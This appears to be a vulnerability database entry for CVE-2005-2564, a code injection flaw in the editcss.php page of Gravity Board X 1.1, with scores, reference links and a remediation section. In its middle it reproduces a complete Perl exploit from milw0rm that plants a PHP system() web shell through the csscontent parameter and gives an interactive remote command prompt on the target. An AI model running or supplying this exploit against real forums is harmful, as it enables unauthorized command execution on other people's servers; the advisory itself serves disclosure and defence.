CVE-2005-2564
CVSS 7.5
Published: 2005-08-16 00:00:00
Revised: 2016-10-17 23:28:27

[Original] Direct static code injection vulnerability in editcss.php in Gravity Board X (GBX) 1.1 allows remote attackers to execute arbitrary PHP code, HTML, and script via the csscontent parameter, which is directly inserted into the gbxfinal.css file.


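[CNNVD] Gravity Board X 'editcss.php' static code injection vulnerability (CNNVD-200508-128)

        A direct static code injection vulnerability exists in the editcss.php page of Gravity Board X (GBX) 1.1. It allows remote attackers to execute arbitrary PHP code, HTML, or script via the csscontent parameter (which is inserted directly into the gbxfinal.css file).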

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

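- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found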

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2564
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2564
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-128
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112351740803443&w=2
(UNKNOWN)  BUGTRAQ  20050807 Gravity Board X v1.1 multiple vulnerabilities
http://xforce.iss.net/xforce/xfdb/21742
(UNKNOWN)  XF  gravityboardx-template-xss(21742)

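- Vulnerability information

Gravity Board X 'editcss.php' static code injection vulnerability
High risk  Unknown
2005-08-16 00:00:00 2005-10-20 00:00:00
Remote
        A direct static code injection vulnerability exists in the editcss.php page of Gravity Board X (GBX) 1.1. It allows remote attackers to execute arbitrary PHP code, HTML, or script via the csscontent parameter (which is inserted directly into the gbxfinal.css file).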

- Advisories and patches

        

- Vulnerability information (1510)

Gravity Board X <= 1.1 (csscontent) Remote Code Execution Exploit (EDBID:1510)
php webapps
2006-02-17 Verified
0 RusH
N/A
#!/usr/bin/perl

## Gravity Board X v1.1 (possibly prior versions) remote code execution exploit
## (c)oded by 1dt.w0lf
## 14.08.2005
## RST/GHC
## http://rst.void.ru
## http://ghc.ru

use LWP::UserAgent;

if(@ARGV<1) { &usage; exit(0); }

$path = $ARGV[0];
header();
print "Creating shell... Please wait\n";

$gr = LWP::UserAgent->new() or die;
$res = $gr->get($path.'editcss.php?csscontent=</style><?php error_reporting(0); system($HTTP_POST_VARS[cmd]); ?>');
if($res->as_string =~ /unable to save changes/)
 {
 print "Forum unable to save changes in css template. Exploitation failed.\n";
 exit(0);
 }
print "DONE.\n";

while ()
 {
    print "Type command for execute or 'q' for exit\nGravity# ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'q');
        last;
     }
    &run($cmd);
 }

sub run()
 {
 $cmd2  = 'echo 1 && echo _START_ && ';
 $cmd2 .= $cmd;
 $cmd2 .= ' && echo _END_';
 $gr = LWP::UserAgent->new() or die;
 $res = $gr->post($path.'index.php',{"cmd" => "$cmd2"});   
 @result = split(/\n/,$res->content);
 $runned = 0;
 $on = 0;
 print "\n";
 for $res(@result)
  {
    if ($res =~ /^_END_/) { print "\n"; return 0; }
    if ($on == 1) { print "  $res\n"; }
    if ($res =~ /^_START_/) { $on = 1; $runned = 1; } 
  }
 print "Can't execute command\n" if !$runned;
 }

sub header()
{
 print "--* Gravity Board X v1.1 exploit by RST/GHC\n";
 print "--* keep it private, not for public\n";
}

sub usage()
 {
  header();
  print "usage : r57Gravity.pl [path_to_forum]\n";
  print "  e.g.: r57Gravity.pl http://127.0.0.1/forum/\n";
 }

# milw0rm.com [2006-02-17]
		

- Vulnerability information

18628
Gravity Board X editcss.php Template Edit Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Gravity Board X contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'editcss.php' not properly sanitizing user-supplied input. This may allow a remote attacker to arbitrarily manipulate the template and execute arbitrary commands, resulting in a loss of integrity.

- Timeline

2005-08-07 Unknown
2005-08-07 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

 

 
